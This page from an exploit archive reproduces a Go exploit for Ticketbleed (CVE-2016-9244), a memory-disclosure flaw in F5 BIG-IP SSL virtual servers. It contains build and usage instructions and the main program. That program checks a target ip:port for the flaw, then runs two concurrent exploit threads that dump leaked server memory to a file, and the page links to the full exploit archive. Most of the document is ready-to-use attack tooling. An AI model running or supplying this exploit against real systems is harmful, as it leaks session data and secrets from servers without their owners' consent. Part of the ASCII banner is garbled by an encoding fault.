Skip to content
cyberexploits
remotehardwaretext

F5 BIG-IP SSL Virtual Server - Memory Disclosure

F5 BIG-IP SSL Virtual Server - Memory Disclosure

Publié le 2017-02-10

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/remote/41298.txt7eac4c3a
raw
/*

# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]

# Date: [10.02.2017]

# Exploit Author: [Ege Balcı]

# Vendor Homepage: [https://f5.com/]

# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]

# Tested on: [Multiple]

# CVE : [CVE-2016-9244]









BUILD:

	go get github.com/EgeBalci/Ticketbleed

	go build Ticketbleed.go



USAGE:

	./ticketbleed <options> <ip:port>

OPTIONS:

	-o, --out 	Output filename for raw memory

	-s, --size 	Size in bytes to read

	-h, --help 	Print this message



*/

package main



import "github.com/EgeBalci/Ticketbleed"

import "strconv"

import "strings"

import "fmt"

import "os"





var OutputFile string = ""

var BleedSize int = 0



func main() {





	ARGS := os.Args[1:]

	if len(ARGS) < 1 || len(ARGS) > 5{

		fmt.Println(Help)

		os.Exit(1)

	}



  	for i := 0; i < len(ARGS); i++{



		if ARGS[i] == "-h" || ARGS[i] == "--help"{

			fmt.Println(Help)

			os.Exit(1)

	  	}



		if ARGS[i] == "-o" || ARGS[i] == "--out"{

			OutputFile = ARGS[i+1]

	  	}



	  	if ARGS[i] == "-s" || ARGS[i] == "--size"{

	  		Size,err := strconv.Atoi(ARGS[i+1])

	  		if err != nil {

	  			fmt.Println("[-] ERROR: Invalid size value !")

	  			os.Exit(1)

	  		}

	  		if Size < 0 {

	  			fmt.Println("[-] ERROR: Size can't be smaller than 0")

	  			os.Exit(1)

	  		}else{

	  			BleedSize = Size

	  		}

	  	}

 	}



	if OutputFile != "" {

		File, FileErr := os.Create(OutputFile)

		if FileErr != nil {

			fmt.Println("[-] ERROR: While creating output file !")

			os.Exit(1)

		}

		File.Close()

		fmt.Println("[*] Output file: "+OutputFile)

	}



 	VulnStatus := Ticketbleed.Check(ARGS[0])								// First check if it's vulnerable

 	fmt.Println(VulnStatus)

 	if strings.Contains(VulnStatus, "[+]") {

 		

 		go Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))  		// With using multiple threads it is easyer to move on stack

 		Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))				// Othervise server echoes back alot of duplicate value

 	}



}







var Help string = `

▄▄▄█████▓ ██▓ ▄████▄   ██ ▄█▀▓█████▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄ 

▓  ██▒ ▓▒▓██▒▒██▀ ▀█   ██▄█▒ ▓█   ▀▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌

▒ ▓██░ ▒░▒██▒▒▓█    ▄ ▓███▄░ ▒███  ▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌

░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒▓██ █▄ ▒▓█  ▄░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌

  ▒██▒ ░ ░██░▒ ▓███▀ ░▒██▒ █▄░▒████▒ ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 

  ▒ ░░   ░▓  ░ ░▒ ▒  ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒ 

    â–‘     â–’ â–‘  â–‘  â–’   â–‘ â–‘â–’ â–’â–‘ â–‘ â–‘  â–‘   â–‘    â–’â–‘â–’   â–‘ â–‘ â–‘ â–’  â–‘ â–‘ â–‘  â–‘ â–‘ â–‘  â–‘ â–‘ â–’  â–’ 

  â–‘       â–’ â–‘â–‘        â–‘ â–‘â–‘ â–‘    â–‘    â–‘       â–‘    â–‘   â–‘ â–‘      â–‘      â–‘    â–‘ â–‘  â–‘ 

          â–‘  â–‘ â–‘      â–‘  â–‘      â–‘  â–‘         â–‘          â–‘  â–‘   â–‘  â–‘   â–‘  â–‘   â–‘    

             â–‘                                    â–‘                        â–‘      



Author: Ege Balci

Github: github.com/EgeBalci





USAGE: 

	./ticketbleed <ip:port> <options> 

OPTIONS:

	-o, --out 	Output filename for raw memory

	-s, --size 	Size in bytes to read

	-h, --help 	Print this message

`



https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip
Voir sur GitHub